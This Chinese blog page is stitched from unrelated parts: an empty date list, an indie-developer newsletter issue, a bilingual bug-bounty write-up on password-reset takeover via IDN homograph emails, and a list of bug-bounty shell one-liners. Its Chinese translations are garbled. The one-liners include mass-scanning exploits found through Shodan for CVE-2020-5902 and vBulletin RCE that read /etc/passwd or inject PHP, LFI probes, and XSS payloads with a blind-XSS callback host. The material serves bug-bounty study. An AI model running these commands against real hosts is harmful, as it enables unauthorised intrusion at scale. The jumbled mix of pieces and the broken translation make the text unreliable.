每日思考——2021年12月

不想付费,可以加我微信(pxiaoer2025),拉你。

12月1日

12月2日

12月3日

12月4日

12月5日

12月6日

12月7日

12月8日

12月9日

12月10日

12月11日

12月12日

12月13日

12月14日

12月15日

12月16日

12月17日

12月18日

12月19日

12月20日

12月21日

12月22日

12月23日

12月24日

12月25日

12月26日

12月27日

12月28日

12月29日

12月30日

12月31日

独立开发变现周刊(第30期):免费漂亮的插画

分享独立开发、产品变现相关有价值的内容,每周五发布。

目录

  • 1、Cotter: 无密码登录的网站组件
  • 2、Poet.so: 生成绚丽的Twitter的卡片
  • 3、Designstripe: 免费漂亮的插画
  • 4、Typeform: 让表单收集交互动起来
  • 5、Medusa:开源的Shopify替代方案
  • 6、Chilly.tools: 直接在OpenSea 上看到稀有的NFTs

1、Cotter: 无密码登录的网站组件

cotter 是一个免密登录组件,可以方便的嵌入到你的网站中。只需要在线配置登录组件样式,和一些登录后的规则,就可以通过链接方便的嵌入到你的网站中,这样用户来到网站,通过登录就可以获取一些内容的访问权限。而实现这个过程不需要代码编写,只需要在线配置即可。

cotter这个产品已经有超过3000+的开发者使用,并已经被Stytch收购。

图片

cotter.app官网[1]

2、Poet.so: 生成绚丽的Twitter的卡片

这是一个小工具,可以帮助你创建吸引眼球的Twitter帖子图片。这个产品在Product Hunt上当天排名第一。

在Twitter之外的常规分享方式看起来有点乏味,用这个工具输入url就可以自动提取帖子内容,在线编辑就可以生成一张绚丽的图片,非常吸引人。

评论里有人说到另外一个使用场景就是自己写书,会用到Twitter上的截图,但是那种截图很难看,这个小工具恰好能帮助到他。

作者通过设置提取数量的限制,来实现盈利。

图片

poet.so官网[2]

3、Designstripe: 免费漂亮的插画

随着插画风格的网站越来越多,插画的设计需求也越来越多。designstripe网站的插画质量都非常高,提供免费的插件下载。

图片

也有付费的插画,可以在线进行编辑设置,根据提供的插件组件,设计自己独特的插画。

图片

designstripe官网[3]

4、Typeform: 让表单收集交互动起来

typeform这个网站的整体风格、交互体验都非常棒。typeform主要是做表单收集设定,与传统表单收集的产品不太一样的地方,是提供更多的动态交互体验,像图片、视频等,在用户填写表单的时候能获得更优雅的体验。网站还提供了非常多的模板示例,像:调查问卷、Quiz、意见调查等等

图片

Typeform官网[4]

5、Medusa:开源的Shopify替代方案

Medusa是一个Headless商业后台方案,提供了2个默认的前端展示。是一个高度可定制的商业性质API。提供了常用的服务模块,像:订单、购物车、商品、支付、发货等等。如果你想搭建自己的店铺,不妨参考下这个项目。

Github上有3K多Star,提供Cli进行安装和启动应用。

图片

Medusa的Github地址[5]

6、Chilly.tools: 直接在OpenSea 上看到稀有的NFTs

chilly.tools的Chrome扩展插件给你NFTs的稀有分数,稀世排名,和收集量/价格趋势,直接在OpenSea上就可以查看。

图片

Nikita也没有想到会有人花0.99ETH来购买这项服务,在这样一个非常小众的市场里。

图片

chilly.tools官网[6]

  1. cotter.app官网: https://www.cotter.app/
  2. poet.so官网: https://poet.so/
  3. designstripe官网: https://designstripe.com/
  4. Typeform官网: https://www.typeform.com/
  5. Medusa的Github地址: https://github.com/medusajs/medusa
  6. chilly.tools官网: https://chilly.tools/

(第29期):只需3步,一张纸生成一个网站

(第28期):一个JavaScript组件做到了150万美金收入

(第 21 期):辞职后做了3个产品,终于不用回去上班了

图片

加入知识星球,和我一起做自己产品的独立变现

How I was able to change victim’s password using IDN Homograph Attack

我是如何使用 IDN欺骗软件改变受害者的密码的

Abhishek Karle

Hey guys Abhishek this side. This is my first writeup. This article is about a vulnerability I was able to find in the BugCrowd private program.

嘿,伙计们,阿披实在这边。这是我写的第一篇文章。本文是关于我能够在 BugCrowd 私有程序中找到的一个漏洞。

What is IDN homograph attack?

什么是 IDN欺骗?

The internationalized domain name (IDN) homograph attack is a way a malicious party may deceive computer users about what remote system they are communicating with, by exploiting the fact that many different characters look alike (i.e., they are homographs, hence the term for the attack, although technically homograph is the more accurate term for different characters that look alike). For example, a regular user of example.com may be lured to click a link where the Latin character “a” is replaced with the Cyrillic character “а”.

国际化域名同形异义词攻击是恶意用户利用许多不同字符看起来相似的事实,欺骗计算机用户他们正在与什么远程系统通信的一种方式(例如,他们是同形异义词,因此这种攻击的术语,尽管从技术上来说同形异义词是对不同字符看起来相似的更准确的术语)。例如,example. com 的常规用户可能会被诱惑点击一个链接,其中拉丁字符“ a”被西里尔字符“”替换。

One day I saw interesting #bugbountytips post on twitter https://twitter.com/musiclouderlml/status/1276987908340232193?s=19

有一天我在 twitter 上看到了一个有趣的 https://twitter.com/musiclouderlml/status/1276987908340232193?s=19

Then I thought why not give a try. I started hunting for this bug on Bugcrowd private program. Let’s call target.com .

然后我想为什么不试试。我开始在 Bugcrowd 私人程序中寻找这个 bug。我们打电话给 target.com。

Tha web application “https://target.com/forgot-password?email=” fails to properly validate the value of “email” which was used to takeover the user’s account by changing his password using IDN homograph attack.

网络应用程序“ https://target.com/forgot-password?email=”无法正确验证“电子邮件”的价值,而这个电子邮件通过改变用户的密码来接管用户的 IDN欺骗。

IDN homograph attack exploits the fact that many different charachters look like a is different from á Because in that we used a acute accent which looks like exactly a, Suppose the victim’s account is abc@gmail.com , attacker ask password reset link for abc@gmáil.com, target.com’s mail system send password reset link of victim- abc@gmail.com to the attacler mail- abc@xn — gmil-6na.com, To perform this attack , attacker have to buy domain xn — gmil-6na.com

IDN欺骗利用了这样一个事实,即许多不同的字符看起来像 a,而不像 a,因为在这里我们使用了一个看起来像 a 的锐角重音,假设受害者的帐户是 abc@gmail. com,攻击者要求密码重置链接到 abc@gmáil. com,target. com 的邮件系统将 victim-abc@gmail. com 的密码重置链接发送到 attacler mail-abc@mil-6na. com,要执行这种攻击,攻击者必须购买域名 xn ー g6na。Com

How to test without buying domain ?

如何测试而不购买域名?

  • The answer is using burp collaborator client.
  • 答案是使用 burp 合作者客户机。

We have to create a account on target.com with email- abc@gmail.com.burpcollaboratorpayloadhere

我们必须在 target. com 上创建一个账户,在这里输入 email-abc@gmail. com. burpcollaboratorpayloadhere

So when we ask password reset link for abc@gmáil.com.burpcollaboratorpayloadhere , target.com’s send password reset link of user- abc@gmail.com.burpcollaboratorpayloadhere to the mail- abc@xn — gmil-6na.com.burpcollaboratorpayloadhere , the password reset link received on Burp collaborator client. Make sure to check in burp collaborator client , received email details: To- abc@xn — gmil-6na.com.burpcollaboratorpayloadhere.

因此,当我们询问 abc@gmáil. com 的密码重置链接时。Burpcollaboratorpayloadhere,target.com’s send password reset link of user-abc@gmail. com. burpcollaboratorpayloadhere to the mail-abc@xn ー gmil-6na. com。这里是 burpcollaboratorpayloadhere,burpcollaborator 客户端接收到的密码重置链接。确保签入饱嗝合作者客户,收到电子邮件的详细信息: To-abc@xn ー gmil-6na. com。这里是 burpcollaboratorpayloadhere。

Steps to reproduce-

复制步骤-

  1. Open the burp collaborator client > Generate Collaborator payload .
  2. 打开 burp 合作者客户端 > Generate Collaborator 有效负载。
  3. Go to the sign up page of target.com and create a new account with email- abc@gmail.com.burpcollaboratorpayloadhere
  4. 访问 target. com 的注册页面,创建一个新的账户,其电子邮件地址为: abc@gmail. com. burpcollaboratorpayloadhere
  5. Now if the target.com has email confirmation > you will receive the email confirmation link in burp collaborator client > verify the email.
  6. 现在,如果目标网站有电子邮件确认 > 你将收到电子邮件确认链接在 burp 合作者客户端 > 验证电子邮件。
  7. Go to password reset page of target.com > enter email as abc@gmáil.com.burpcollaboratorpayloadhere
  8. 点击密码重置页面 target. com > 输入电子邮件作为 abc@gmáil. com. burpcollaboratorpayloadhere
  9. If the target.com is vulnerable then it will send password reset link to the mail- abc@xn — gmil-6na.com.burpcollaboratorpayloadhere and you will receive password reset link in burp collaborator client. Make sure to check in burp collaborator client -received email details: To- abc@xn — gmil-6na.com.burpcollaboratorpayloadhere.
  10. 如果目标网站是脆弱的,那么它将发送密码重置链接到 mail-abc@xn ー gmil-6na. com。在这里,你将在 burp collaborator 客户端接收到密码重置链接。确保签入饱嗝合作者客户收到的电子邮件详细信息: To-abc@xn ー gmil-6na. com。这里是 burpcollaboratorpayloadhere。
  11. Now you can change the password and access the victim’s account.
  12. 现在你可以更改密码并访问受害者的账户了。

Result-

成绩 –

Special thanks to https://twitter.com/musiclouderlml for sharing #bugbountytips.

特别感谢 https://twitter.com/musiclouderlml 分享 # bugbountytips。

Hope you guys enjoyed. Thanks for reading.

希望你们喜欢。谢谢阅读。

一句话漏洞赏金

Bug Bounty

A collection of awesome one-liner scripts especially for bug bounty tips.


This repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily welcome.

Local File Inclusion

@dwisiswant0

gau domain.tld | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'

Open-redirect

@dwisiswant0

export LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'

@N3T_hunt3r

cat waybackurl.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null

XSS

@cihanmehmet

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt

@fanimalikhack

 waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt

Prototype Pollution

@R0X4R

subfinder -d target.com -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

CVE-2020-5902

@Madrobot_

shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done

CVE-2020-3452

@vict0ni

while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt

vBulletin 5.6.2 – ‘widget_tabbedContainer_tab_panel’ Remote Code Execution

@Madrobot_

shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;

Find JS Files

@D0cK3rG33k

assetfinder site.com | gau|egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)'|while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" |sed -e 's, 'var','"$url"?',g' -e 's/ //g'|grep -v '.js'|sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars";done

Extract Endpoints from JS File

@renniepak

cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

Get CIDR & Orgz from Target Lists

@steve_mcilwain

for DOMAIN in $(cat domains.txt);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d
one | uniq); done

Get Subdomains from RapidDNS.io

@andirrahmani1

curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u

Get Subdomains from BufferOver.run

@_ayoubfathi_

curl -s https://dns.bufferover.run/dns?q=.DOMAIN.com |jq -r .FDNS_A[]|cut -d',' -f2|sort -u

@AnubhavSingh_

curl "https://tls.bufferover.run/dns?q=$DOMAIN" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$DOMAIN"

Get Subdomains from Riddler.io

@pikpikcu

curl -s "https://riddler.io/search/exportcsv?q=pld:domain.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u 

Get Subdomains from VirusTotal

@pikpikcu

curl -s "https://www.virustotal.com/ui/domains/domain.com/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomain with cyberxplore

@pikpikcu

curl https://subbuster.cyberxplore.com/api/find?domain=yahoo.com -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+"

Get Subdomains from CertSpotter

@caryhooper

curl -s "https://certspotter.com/api/v1/issuances?domain=domain.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | tr -d '[]"\n ' | tr ',' '\n'

Get Subdomains from Archive

@pikpikcu

curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

Get Subdomains from JLDC

@pikpikcu

curl -s "https://jldc.me/anubis/subdomains/domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

Get Subdomains from securitytrails

@pikpikcu

curl -s "https://securitytrails.com/list/apex_domain/domain.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".domain.com" | sort -u

Bruteforcing subdomain using DNS Over

@pikpikcu

while read sub;do echo "https://dns.google.com/resolve?name=$sub.domain.com&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".domain.com" | sort -u ; done < wordlists.txt

Get Subdomains With sonar.omnisint.io

@pikpikcu

curl --silent https://sonar.omnisint.io/subdomains/twitter.com | grep -oE "[a-zA-Z0-9._-]+\.twitter.com" | sort -u 

Get Subdomains With synapsint.com

@pikpikcu

curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2Fdomain.com" | grep -oE "[a-zA-Z0-9._-]+\.domain.com" | sort -u 

Get Subdomains from crt.sh

@vict0ni

curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

Sort & Tested Domains from Recon.dev

@stokfedrik

curl "https://recon.dev/api/search?key=apikey&domain=example.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent

Subdomain Bruteforcer with FFUF

@GochaOqradze

ffuf -u https://FUZZ.rootdomain -w jhaddixall.txt -v | grep "| URL |" | awk '{print $4}'

Find All Allocated IP ranges for ASN given an IP address

wains.be

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net $1 | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n

Extract IPs from a File

@emenalf

grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt

Ports Scan without CloudFlare

@dwisiswant0

subfinder -silent -d uber.com | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe

Create Custom Wordlists

@tomnomnom

gau domain.com| unfurl -u keys | tee -a wordlist.txt ; gau domain.com | unfurl -u paths|tee -a ends.txt; sed 's#/#\n#g' ends.txt  | sort -u | tee -a wordlist.txt | sort -u ;rm ends.txt  | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' wordlist.txt
cat domains.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a words.txt  

Extracts Juicy Informations

@Prial Islam Khan

for sub in $(cat domains.txt);do /usr/bin/gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq |egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a file.txt  ;done

Find Subdomains TakeOver

@hahwul

subfinder -d {target} >> domains ; assetfinder -subs-only {target} >> domains ; amass enum -norecursive -noalts -d {target} >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; 

Get multiple target’s Custom URLs from ParamSpider

@hahwul

cat domains | xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % ;

URLs Probing with cURL + Parallel

@akita_zen

cat alive-subdomains.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk

Dump In-scope Assets from chaos-bugbounty-list

@dwisiswant0

curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'

Dump In-scope Assets from bounty-targets-data

@dwisiswant0

HackerOne Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'

BugCrowd Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Intigriti Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'

YesWeHack Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

HackenProof Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv'

Federacy Programs

curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'

Get all the urls out of a sitemap.xml

@healthyoutlet

curl -s domain.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Pure bash Linkfinder

@ntrzz

curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt

Extract Endpoints from swagger.json

@zer0pwn

curl -s https://domain.tld/v2/swagger.json | jq '.paths | keys[]'

CORS Misconfiguration

@manas_hunter

site="https://example.com"; gau "$site" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

Find Hidden Servers and/or Admin Panels

@rez0__

ffuf -c -u https://target .com -H "Host: FUZZ" -w vhost_wordlist.txt 

Recon using api.recon.dev

@z0idsec

curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=site.com | jg .[].domain

Find live host/domain/assets

@YashGoti

subfinder -d http://tesla.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u

XSS without gf

@HacktifyS

waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Extract endpoints from APK files

@laughface809

apkurlgrep -a path/to/file.apk

Get Subdomains from IPs

@laughface809

python3 hosthunter.py <target-ips.txt> > vhosts.txt

webscreenshot

@laughface809

python webscreenshot.py -i list.txt -w 40

Removes duplicate URLs and parameter combinations

@laughface809

cat urls.txt |qsreplace -a

Gather domains from content-security-policy:

@geeknik

curl -v -silent https://$domain --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" |  sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u